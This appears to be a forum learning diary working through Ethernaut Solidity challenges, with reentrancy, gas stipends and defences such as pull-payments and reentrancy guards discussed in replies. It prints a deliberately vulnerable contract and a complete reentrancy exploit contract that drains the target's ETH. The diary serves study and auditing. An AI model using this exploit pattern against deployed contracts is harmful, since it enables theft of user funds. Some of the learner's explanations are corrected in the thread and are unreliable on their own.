My Coding Journey: From Finance to Smart Contract Auditor

This is the contract's fallback function.

The syntax of an anonymous (nameless) function has been deprecated for quite a long time (since around solc v0.4), and even though it is still allowed by the compiler, the official syntax is:

fallback() external payable

P.S.: I hope that you've spent some time going through this response (above), as you may find some important insights in there.

1 Like

Ah I did think this looked a bit odd, and your explanation makes total sense so thank you again for explaining!

I'm so sorry I didn't directly respond to your other post, I've actually been meaning to but wanted to do some further digging. I looked a little further into whether there is any added value to prevent a contract that doesn't implement a receive or fallback function to hold ETH, yet being able to receive it at an address that already holds ETH. I agree with you there is no added value in preventing this measure, for some reason I thought zero-value transfer scams might be an instance of this but quickly realised this was not the case (this sort of scam was more phishing and sending to the wrong address).

I also really liked your mentioned of an SCA, that really contextualised what I've been seeing in various other code reviews I've looked into.

1 Like

Day 17:

I needed to dissect the King.sol contract a little further despite having the solution and helpful commentary from others. My primary source was given by OpenZeppelin here and stepped out the real life instance of the previous smart contract challenge (called King of the ETH or KotE).

Breaking down my learnings:

  • as commented by barakman and OZ: There are two fundamental accounts: "externally-owned accounts" (normally controlled by a human) and "contract accounts" (SCAs) and are often under the control of a contract;
  • the issue with this contract is that the client is asking users to create SCAs to hold their ether. By itself this was not an issue but with the inclusion of a gas fee (in this case not enough to execute the transaction - 2300 gas), caused the wallet contract to fail; and
  • the flow on effect of this meant when a wallet contract failed to process, the payment sent to it by the KotE contract, the ETH paid was returned to the KotE contract. The logic behind KotE contract meant that it did not recognise the operation had failed and it continued to process. What does this mean in plain English? the contract caller became the king despite the compensation payment not having been sent to the previous monarch.

I found contextualising the problem via the OZ website immensely helpful in understanding the contract logic and a proper understanding of EOA and SCA accounts went a long way to assisting this understanding. I recommend others read the postmortem audit because it certainly makes you appreciate the need to test contracts extensively before their deployment!!

1 Like

The wording here is somewhat partial and inaccurate, so let's rephrase that...

First off, here are the primary differences between these two account types:

+------------------+------------------------------+---------------------------------------+
| Account type     | Private key known to creator | Contract bytecode deployed at address |
+------------------+------------------------------+---------------------------------------+
| Externally owned | Yes                          | No                                    |
+------------------+------------------------------+---------------------------------------+
| Smart contract   | No                           | Yes                                   |
+------------------+------------------------------+---------------------------------------+

Second, let's clarify the meaning of "control".

The creator of an externally-owned account can use its private key in order to sign and execute the following types of transactions:

  1. Transfer ETH to another externally-owned account
  2. Transfer ETH to a smart-contract account
  3. Execute a function implemented in the bytecode deployed at smart-contract account's address

Type 2 is essentially a special case of type 3, since transferring ETH to a contract can only take place as part executing a function in that contract (when no function is specified, the receive function is executed if it is implemented, otherwise the fallback function is executed).

So in short, we can state that the creator of an externally-owned account is the one who controls this account via its private key.

The same statement cannot be applied for the creator of a smart-contract account, in the sense that the private key of that account is not known to its creator.

Here, the term "control" is used in a different perspective altogether, namely, this term is used for describing who can execute the smart-contract functions, where "who" stands for other accounts of both types (externally-owned accounts and smart-contract accounts).

And in order to restrict the execution of a function to only specific accounts, the creator of the smart contract needs to explicitly apply this restriction as part of the contract implementation, for example:

function func() external {
    if (msg.sender != address(0x1234567812345678123456781234567812345678)) {
        revert("only 0x1234567812345678123456781234567812345678 allowed");
    }
}

Open Zeppelin implements several different access-restriction mechanisms, which are widely-accepted as some sort of de-facto standard, and have therefore been thoroughly verified by a large community of developers.

1 Like

Thank you for further elaborating on the account types - I had understood it exactly as you laid out but my wording wasn't as eloquent as yours (especially with respect to your description of Type 2 - that was immensely helpful!!)

A huge thank you for forwarding the access-restriction mechanisms and providing that example. I think the only context I had really seen this in play (and correct me if I'm wrong) but it is in the context of role creation (e.g. defining an admin role, defining a user gatekeeper role) in an NFT. For example, there is an admin role that is often the owner, restricting how many NFTs a user can own and thus, implementing a restriction similar to your 'function func() external'.

Out of curiosity, I'd love to get your perspective on any of the security issues raised from the KoTE contract I had linked in Day 17! I think you've got a better handle on the practical security issues mentioned in the postmortem.

1 Like

Day 18:

I have been building towards this challenge for a while because the issue it relates to is still very much alive in this space - reentrance attacks!!

Contract

// SPDX-License-Identifier: MIT
pragma solidity ^0.6.12;

import 'https://github.com/OpenZeppelin/openzeppelin-contracts/blob/release-v3.4/contracts/math/SafeMath.sol';

contract Reentrance {
  
  using SafeMath for uint256;
  mapping(address => uint) public balances;

  function donate(address _to) public payable {
    balances[_to] = balances[_to].add(msg.value);
  }

  function balanceOf(address _who) public view returns (uint balance) {
    return balances[_who];
  }

  function withdraw(uint _amount) public {
    if(balances[msg.sender] >= _amount) {
      (bool result,) = msg.sender.call{value:_amount}("");
      if(result) {
        _amount;
      }
      balances[msg.sender] -= _amount;
    }
  }

  receive() external payable {}
}

Breakdown of the Contract

  • an older version of solidity is being used here so I immediately suspect legacy issues will play into the solution;
  • SafeMath is imported, which if you remember, deals with the issues relating to under/overflow in a contract;
  • a publicly callable uint address is mapped to 'balances';
  • the publicly executable 'donate' function requires an address, whereby the balances (represented by 'balances[_to]') of the address are added to on receipt of a donation;
  • the publicly viewable function of 'balanceOf' (taking the parameters of who's address) returns a uint balance of _who;'
  • the publicly executable function 'withdraw' takes an uint amount where it withdraws if the balances of the msg.sender are >= the _amount (with said _amount being 0). Note that if this condition is satisfied (via a TRUE boolean result), the msg.sender can call a certain value amount (represented by the data input ' "" '). If this amount is 0, then the contract does not execute. Once this function has been executed, the balances of the msg.sender are subtracted by the amount requested; and
  • the receive function is implemented such that it is triggered when the contract receives ETH and by extension, allows the contract to receive ETH.

The Solution
One tip before getting started is you will need to access the 3.4.0 version of the safemath contract stored on the OZ github. To do this, click on the MASTER option in branches, go to 3.4.0 then look into the contracts folder for SafeMath.sol then import the url into your challenge contract to ensure it compiles properly. I have done this in my code above for your convenience.

  • first, understand a reentrancy attack. The way I understand its logic is as follows: 1) the attacker sends 1 ETH to a contract, 2) the attacker then withdraws this amount via the withdraw function, 3) the attacker's contract contains a fallback function that is triggered when the withdraw function is called, 4) the fallback function creates a loop such that the withdraw function continues until a target is drained of its funds;
  • to spot a risk of reentrancy attacks, I always look for instances where the contract interacts with external points (for example, the withdraw function interacts with a third party by sending ETH external to the contract); and
  • implementing both of the above, my solution was: call the withdraw function after sending some amount of ETH, this will trigger the malicious fallback function, causing a loop that will continue until the contract is fully drained of its funds.

I'll post code for my attack tomorrow but I want to give others a chance to digest the above before doing so / ask any questions / critique my understanding so I can walkthrough the code.

1 Like

Not true if msg.sender is a contract which does not implement a payable receive function or a payable fallback function.
In other words, msg.sender is a "non-payable" contract which implements a function which executes new King(), and someone has executed that function.


That's wrong.
First of all, they are not "a function that can receive ETH", they are addresses.
Second, the constructor merely stores these input addresses into the contract state variables.
Third, there isn't any straightforward, clean, simple and cheap way to check if an address can receive ETH. At least not onchain (i.e., in a contract code). Doing it offchain (e.g., in web3.js script) is pretty simple, and of course - doesn't cost any gas.


FYI, you may as well just declare address public king (like you do with each one of the other two state variables).
The compiler will then implicitly generate a public function of the same name (king), which returns the value of that variable.


Well, you haven't quite stated up until this point what the problem is, so jumping to "The Solution" here is a bit confusing. But anyway, here are the problems that I see in this contract:

Problem #1 - Financial Incentive

First of all, every time an account which is not the owner transfers an amount of ETH to your contract:

  • If that amount is smaller than the current value of prize, then the transaction reverts, and the caller has spent gas for nothing
  • If that amount is equal to or larger than the current value of prize, then the caller gets it back and ends up spending gas for nothing

The latter bullet applies for the owner account regardless of the amount of ETH.
So in short, there is absolutely no incentive for anyone to ever use your contract.

Problem #2 - Receiving ETH

There are two potential issues in your contract's receive function:

  1. It might be subjected to reentrancy
  2. It might revert due to gas stipend

The account sending ETH to your contract can be any one of 5 different types.
The account pointed by address king can be any one of 5 different types.

Let's denote these types:

  1. EOA
  2. SCA which does not implement a receive or fallback function
  3. SCA which implements a receive or fallback function which does not send ETH back to msg.sender
  4. SCA which implements a receive or fallback function which sends ETH back to msg.sender via send or transfer
  5. SCA which implements a receive or fallback function which sends ETH back to msg.sender via call

So all in all, you have 25 different scenarios, under which you need to inspect each one of the 2 potential issues above.
I'm obviously not going to list all of them, but here are a couple of points which you'd need to take into account:

Point 1

When contract X receives ETH from a function in contract Y via transfer or send executed in that function, the function in contract X (receive or fallback) is limited by a stipend of 2300 gas.
In your contract, that function updates two state variables (king and prize) which are located in two separate storage slots.
And updating even a single storage slot is likely to exceed that gas stipend.
At the time of writing this:

  • Around 2100 gas if the variable's value doesn't change
  • Around 5000 gas if the variable's value changes from non-zero to non-zero
  • Around 22100 gas if the variable's value changes from zero to non-zero

Hence you may be facing a bunch of scenarios in which an attempt to send ETH to your contract would revert due to gas stipend (issue #2 above).
This is not to say that there's an actual problem here.
In fact, it might even be desirable in the sense that it prevents reentrancy attacks (issue #1 above).
But you'd still need to look into this under the perspective of product requirements.
In other words, you'd need to ask yourself if there's a product requirement for supporting a specific scenario, which is not handled as desired.

Point 2

When contract X receives ETH from a function in contract Y via call executed in that function, the function in contract X (receive or fallback) is NOT limited by any gas stipend.
This may open your contract's receive function to reentrancy attacks.
In your specific case, it is not really clear what could possibly be achieved by such an attack, other than the attacker spending their own ETH.
But you should nevertheless look into this under the perspective of security vulnerabilities.

1 Like

Well, I've related to your Day 16 post instead (see here).

Your Day 17 is not very clear to me in general, and in particularly - the following statement:

the flow on effect of this meant when a wallet contract failed to process, the payment sent to it by the KotE contract, the ETH paid was returned to the KotE contract. The logic behind KotE contract meant that it did not recognise the operation had failed and it continued to process. What does this mean in plain English? the contract caller became the king despite the compensation payment not having been sent to the previous monarch.

The part "did not recognise the operation had failed and it continued to process" seems plain wrong.

Your contract function executes payable(king).transfer(msg.value);, which means that if the other contract (pointed by king) fails to receive the ETH, then your contract function reverts at this point and does not "continue to process" anything.

That statement would be correct if your contract function used send or call instead of transfer.


Here are the primary differences between these ETH-sending options:

A function in your contract can send ETH to another contract only if that other contract implements a receive function or a fallback function.

There are 3 ways for you to implement it in your contract function:

  1. Using to.transfer(amount)
  2. Using bool sent = to.send(amount)
  3. Using (bool sent, memory data) = to.call{value: amount}("")

Where to is the address of the other contract.

With options 1 and 2, the other contract's receive and fallback functions revert upon spending more than 2300 gas. Of course, they may also revert for other reasons, depending on their actual implementation.

With options 3, the other contract's receive and fallback functions DO NOT revert upon spending more than 2300 gas. And again, they may also revert for other reasons, depending on their actual implementation.

Going back to YOUR contract function, its behavior upon a revert in the OTHER contract's function is:

  • If you use option 1 (transfer), then your contract function immediately reverts.
  • If you use option 2 (send), then your contract function receives send = false.
  • If you use option 3 (call), then your contract function receives send = false.

As you can see:

  • With option 1, you don't need to worry about your contract continuing to process
  • With option 3, you don't need to worry about the other contract's gas consumption
  • With option 2, you need to worry about BOTH of these aspects

Lastly, regarding:

Well, I obviously can't correct you on what you've seen.
But I can tell you that your conclusion of it is probably wrong.
AFAIK, the most widely used access-restriction mechanism, which also happens to be the oldest one and the simplest one (probably the reason for it being the most widely used one), is Ownable.

1 Like

Not true if msg.sender is a contract which does not implement a payable receive function or a payable fallback function.
In other words, msg.sender is a "non-payable" contract which implements a function which executes new King(), and someone has executed that function.

But in this case, having regard to the rules that specify you will have to send ETH or receive ETH to participate, how likely is it that there wouldn't be a payable receive or fallback function?

First of all, they are not "a function that can receive ETH", they are addresses.
Second, the constructor merely stores these input addresses into the contract state variables.
Third, there isn't any straightforward, clean, simple and cheap way to check if an address can receive ETH. At least not onchain (i.e., in a contract code). Doing it offchain (e.g., in web3.js script) is pretty simple, and of course - doesn't cost any gas.

Noted on your first and second point - good pickup. On your third point, with respect to web3.js script would you do this via: web3.eth.getAccounts(console.log) to check that 1) the address is correct and 2) capable of sending/ receiving ETH.

Well, you haven't quite stated up until this point what the problem is, so jumping to "The Solution" here is a bit confusing. But anyway, here are the problems that I see in this contract:

I had mentioned that the objective was to break the game in the final line of the instructions:

When you submit the instance back to the level, the level is going to reclaim kingship. You will beat the level if you can avoid such a self proclamation.

but agree with your point, perhaps could have been better phrased.

On your points outlined in Problem #1, agreed that there is no incentive for smaller contracts to contribute ETH. However, if your amount is larger, given the rules to the game, my read was that you would become king (effectively returning the gas cost and ETH to a previous player) gradually building a reserve that you may be paid. But from a financial perspective, I 100% agree with you, I don't know why anyone would play this game...for fun supposedly...

On your Problem #2 analysis, that was honestly excellent to read. I had considered that gas stipend would be an issue but the way you broke that down and reentrancy attacks was really insightful. I have a fair amount of work to do in terms of thinking about things from product requirement / security vulnerability perspective.

1 Like

Again, thank you for your reply to Day 16 - on Day 17, I was looking to the actual commercial context that the Ethernaut challenge was based off (link found in Day 17) to better inform my analysis contained at Day 16. Therefore, there may be a bit of mix up between out analysis!

In light of the above, I still really enjoyed reading your breakdown of the ETH-sending options. I hadn't seen either option 2 or 3 used before so it was really informative to read 1) how they may revert and 2) who's gas consumption would be considered if a certain measure was implemented.

On this:

I agree and I understand where you are coming from. Was more interested to hear from you what projects you had seen / worked on that may have used a complex variation of access-restriction mechanisms.

1 Like

My comment wasn't about likelihood or probability; it was referring strictly to your claim of msg.sender being a payable address, which isn't true in all cases. Specifically, it is false when a "non payable" contract is the "sender" (i.e., the account which executes your contract function).


First of all, you obviously can't send ETH from a smart-contract account, using an offchain script.
Second, the ability of a contract to send ETH has nothing to do with its ability to receive ETH.
In order to determine that ability from an offchain script, I would sign a transaction with:

  • data = ""
  • value = 1
  • to = contractAddress
    And then try to call estimate_gas on that signed-transaction.
    If it returns a gas-estimate value successfully, then the contract can receive ETH.
    If it throws a "transaction reverted" exception, then the contract cannot receive ETH.
2 Likes

Day 19:

Further informing my reentrance Ethernaut challenge, I used the following code to complete the challenge (with the objective being to drain the contract of its ETH entirely):

pragma solidity ^0.8;

interface IReentrancy {
    function donate(address) external payable;
    function withdraw(uint256) external;
}

contract Hack {
    IReentrancy private immutable target;

    constructor(address _target) {
        target = IReentrancy(_target);
    }

    function attack() external payable {
        target.donate{value: 1e18}(address(this));
        target.withdraw(1e18);

        require(address(target).balance == 0, "target balance > 0");
        selfdestruct(payable(msg.sender));
    }

    receive() external payable {
        uint256 amount = min(1e18, address(target).balance);
        if (amount > 0) {
            target.withdraw(amount);
        }
    }

    function min(uint256 x, uint256 y) private pure returns (uint256) {
        return x <= y ? x : y;
    }
}

Analysis of my solution

  • 'interface' pulls from the Ethernaut contract Reentrance for ease of reference to the 'donate' and 'withdraw' functions;
  • the constructor requires the deployment of the Hack contract at the same address as the target;
  • the attack function calls the donate (noting that it also donates 1 ETH initially, denominated by 1e18) and then the withdraw function. when you call the function withdraw it will send some ETH to the contract and trigger the fallback function (the receive function - noting that the withdraw function is specified again creating a loop).
  • 'uint256 amount = min(1e18, address(target).balance)' is the condition that ensures the target's address is drained entirely, with 'min' being the quick math specified at the bottom.

Further Analysis
I also noticed that OZ is quoted as saying the following:

Pull-payments are often considered the best practice when it comes to sending Ether, security-wise. It prevents recipients from blocking execution, and eliminates reentrancy concerns.

I thought I'd flag this statement as I intend to delve a little further into it and other external sources like Consensys Diligence's post, the DAO hack and, OZ's very own Reentrancy After Istanbul.

Stay tuned!!

1 Like

How exactly would that return the gas cost to anyone?

Well, amount > 0 is obviously ALWAYS true, hence executing target.withdraw(amount) will probably revert the transaction when the actual balance of the target contract is smaller than 1e18.

Probably, because it is not entirely clear what function withdraw does, so I'm just guessing by its name, that it transfers the input amount (of ETH) from the contract to the caller of that function.

So it is not really clear why you're setting that input amount to a minimum of 1e18.

Also not clear, is how exactly a reentrancy-attack is to be conducted here:

  • Who is the caller
  • What function is called and in which contract
  • Which function is being re-entered as a result

I need to explain myself a bit more on this point.

Here are the contract rules taken directly from the defunct project:

here are the contract rules:
Suppose - for example - the current throne claim price is 10 ETHER. (To find out what it really is, see below.)
You like the sound of being the Monarch, so you send 10 ETHER to the contract.
This makes you the illustrious new King of the Ether. Your name will be added to the Hall of Monarchs in the blockchain.
The contract will then send your 10 ETHER (less a small commission) to the previous Monarch you have usurped, as compensation.
The claim price for the throne will then go up by 33%, to 13.3 ETHER. (It eventually stops increasing at 100000 ETHER for safety).
If an usurper comes along who is willing to pay 13.3 ETHER, she will depose you and become Queen, and you will receive her payment of 13.3 ETHER (less a small commission) as compensation - a tidy profit for you.
However, an ancient curse applies to the throne: every Monarch dies once their reign reaches 14 days. No compensation is paid if this happens, and the claim price for the next monarch is reset back to the original starting price of 500 FINNEY (0.5 ETHER).
But surely a successor will appear within 14 days, and even if they don't, you'll be immortalised in the blockchain at least ...

I read the above to mean the amount you have spent on gas will be reimbursed to you on your eventual usurping.

On your first point, I'd think you want to break the reentrancy loop, don't you? You wouldn't want to have a contract that continues to call withdraw whilst nothing remains in the contract. Is your suggestion to set the amount to exactly 0?

Your understanding here is correct.

  • We are utilising this contract to call the Reentrance contract deployed at the instance address provided by OZ.
  • the attack function is being called in the Hack contract and interacts with the Reetrance contract as described below; and
  • the withdrawal function via the following logic: 1) a user calls the attack function (requiring 1 ETH to be donated in the process). 2) The attack function then calls 'withdraw' the Reentrance contract which it is able to do since you have deposited 1 ETH, 3) on the receipt of your ETH, receive() is triggered whereby it triggers the withdraw function again (creating a loop) because the amount (specified as the lower of 1 ETH and the target balance) is greater than 0.

And exactly what method in your contract makes sure that "gas will be reimbursed to you"?

Gas payment in ETH units goes to the miner of your user's transaction.

Where exactly in your code, does the contract function find what amount of ETH the caller of that function has paid for gas, and where exactly does it send that amount back to the caller?

I think there's been some miscommunication here.

I am not referring to my code that I've posted here. I am referring to the KoTE github where there is an informal process to refund some of the gas fee.

1 Like

Day 20:

I have done some further research as it relates to reentrancy attacks and have compiled various points I have found (along with their sources) below:

Pullpayment Relevant source
I note that OZ says 'implement a pull-payment strategy to mitigate reentrancy concerns. For me I thought...okay but what is that strategy(maybe its me being new to the lingo)? Breaking it down to a core:

  • pull-payment where the paying contract doesn’t interact directly with the receiver account, which must withdraw its payments itself;
  • considering the above reentrancy contract, this makes sense from a security perspective provided a user could directly interact with a contract that may implement a malicious fallback function that continual calls on a withdraw function (thus draining a contract);
  • to implement this function into a contract, use _asyncTransfer as opposed to transfer. Think of the difference between these function as instead of sending the funds to the receiver, it will transfer them to an escrow contract (I have also seen others describe the _asyncTransfer “pulling” funds out of a contract as opposed to “pushing” funds to a receiver.)

Check Effects Relevant source
This is another strategy designed to mitigate reentrancy attacks and makes practical sense when you think about it (i.e. just literally checking a contract's state before it makes further changes to it). I'd note that this was a big issue for earlier versions we've discussed whereby math resulting in under/over flows were a result of unchecked functions. It is implemented in a way such as this:

// SPDX-License-Identifier: GPL-3.0
pragma solidity >=0.6.0 <0.9.0;
contract Fund {
/// @dev Mapping of ether shares of the contract.
mapping(address => uint) shares;
/// Withdraw your share.
function withdraw() public {
uint share = shares[msg.sender];
shares[msg.sender] = 0;
payable(msg.sender).transfer(share);
}
}

Another note about Check-Effect is that it may make calls to functions in other contracts after all planned state changes have been written to storage (Interactions).

Consensys Article (linked above)
Context to the article is that in 2019, discussions were focused on EIP 1884 (Ethereum Improvement Proposals). The effect of its implementation would mean gas cost for fallback functions would increase, breaking contracts that used fallback functions that consumed <2300 gas. This 2300 number is important because this is the amount of gas a contract’s fallback function receives if it’s called via Solidity’s transfer() or send() methods.

The TLD;R of this article is transfer() and send() should be avoided because:

  • gas prices will increase due to the operational code (code governing the resources consumed by an operation) being underpriced at the time, with forecasts pointing to greater resource consumption;
  • using call() avoids a hard dependency on gas costs and is a viable alternative;
  • use check-effects-interactions pattern - see above; and
  • use a reentrancy guard - this is an explicit check for and reject of calls that look for reentrancy patterns, an example is the following:
 1    contract Guarded {
 2    ...
 3
 4    bool locked = false;
 5
 6    function withdraw() external {
 7        require(!locked, "Reentrant call detected!");
 8        locked = true;
 9        ...
10        locked = false;
11    }
12    } 

Well, the 2nd bullet obviously makes the 1st bullet redundant (historically, the 1st bullet was the recommended method prior to the introduction of the 2nd bullet as an ad-hoc reentrancy protection).


Using transfer actually ensures the desired behavior in a wide range of typical use-cases.

Specifically, because:

  1. Unlike send, it reverts the transaction upon failure
  2. Unlike call, it imposes a gas restriction upon entering the contract (receive or fallback) function, which effectively prevents any type of malicious behavior such as reentrancy attack